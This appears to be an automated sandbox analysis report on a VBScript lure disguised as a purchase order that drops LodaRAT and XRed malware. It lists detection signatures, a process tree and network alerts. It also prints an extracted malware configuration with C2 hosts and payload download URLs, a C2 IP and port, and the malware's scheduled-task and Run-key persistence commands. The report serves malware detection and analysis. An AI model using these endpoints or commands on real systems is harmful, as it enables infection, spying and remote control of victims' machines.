Windows Analysis Report
Purchase Order No. G02873362-Docx.vbs

Overview

General Information

Sample name: Purchase Order No. G02873362-Docx.vbs
Analysis ID: 1580572
MD5: 1ab2a527d0e4bd1f76f5467d6e2ea3dc
SHA1: 9731d4f1fc6d6145aa9ed5243cb07b16f17d2f98
SHA256: 115cf5a051098e7bd964d660b0ebead30d851cdbd06886ee2d47007889abae48
Tags: vbsuser-malrpt
Infos:

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • wscript.exe (PID: 5544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • update.exe (PID: 5592 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
  • update.exe (PID: 3068 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
  • update.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 019FC60427D0126ADFEC88980C7FB666)
    • ._cache_update.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
      • cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2992 cmdline: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 4268 cmdline: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6100 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 1D45B99034D67448EBF0776BD5699C84)
  • EXCEL.EXE (PID: 4144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • NUHORT.exe (PID: 4476 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • Synaptics.exe (PID: 8008 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 1D45B99034D67448EBF0776BD5699C84)
  • NUHORT.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • ._cache_update.exe (PID: 3748 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 6556 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • NUHORT.exe (PID: 5744 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: E18974062E92D1E85871E1BE1487F6DC)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Loda, LodaRAT | Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_LodaRat_1 | Yara detected LodaRAT | Joe Security |
sslproxydump.pcap | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\VFNCBO.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\Users\user\Documents\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCX4F1F.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCX4F1F.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
0.3.wscript.exe.229973aa684.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
1.0.update.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
1.0.update.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Initiated: true, ProcessId: 3104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
Source: Network Connection, Author: frack113, Florian Roth: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 3104, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, ProcessId: 4268, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 3104, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, ProcessId: 4268, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", ProcessId: 5544, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ProcessId: 3104, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VFNCBO
Source: Network Connection, Author: frack113: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3168, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ProcessId: 2992, ProcessName: schtasks.exe
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs", ProcessId: 5544, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ProcessId: 3444, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6100, TargetFilename: C:\Users\user\AppData\Local\Temp\32pAPMdc.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-25T09:07:27.246476+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-25T09:08:14.243532+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49753 | TCP
2024-12-25T09:08:54.743495+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49753 | TCP
2024-12-25T09:07:25.916571+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 69.42.215.252 | 80 | TCP
2024-12-25T09:06:59.825228+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-25T09:07:27.246476+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 172.111.138.100 | 5552 | TCP

AV Detection

Source: http://xred.site50.net/syn/SSLLibrary.dl, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rar, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: 0.3.wscript.exe.229973aa684.0.unpack, Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe, ReversingLabs: Detection: 52%
Source: C:\Users\user\Documents\~$cache1, ReversingLabs: Detection: 100%
Source: Purchase Order No. G02873362-Docx.vbs, Virustotal: Detection: 37%
Source: Purchase Order No. G02873362-Docx.vbs, ReversingLabs: Detection: 28%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 98.6% probability
Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknown | HTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknown | HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: wscript.exe, 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp | Binary or memory string: [autorun]
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp | Binary or memory string: autorun.inf
                                Source: RCX4F1F.tmp.6.dr | Binary or memory string: [autorun]
                                Source: RCX4F1F.tmp.6.dr | Binary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_0022FD47 FindFirstFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 7_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E1DD92 GetFileAttributesW,FindFirstFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 16_2_00E4FD47 FindFirstFileW,FindClose
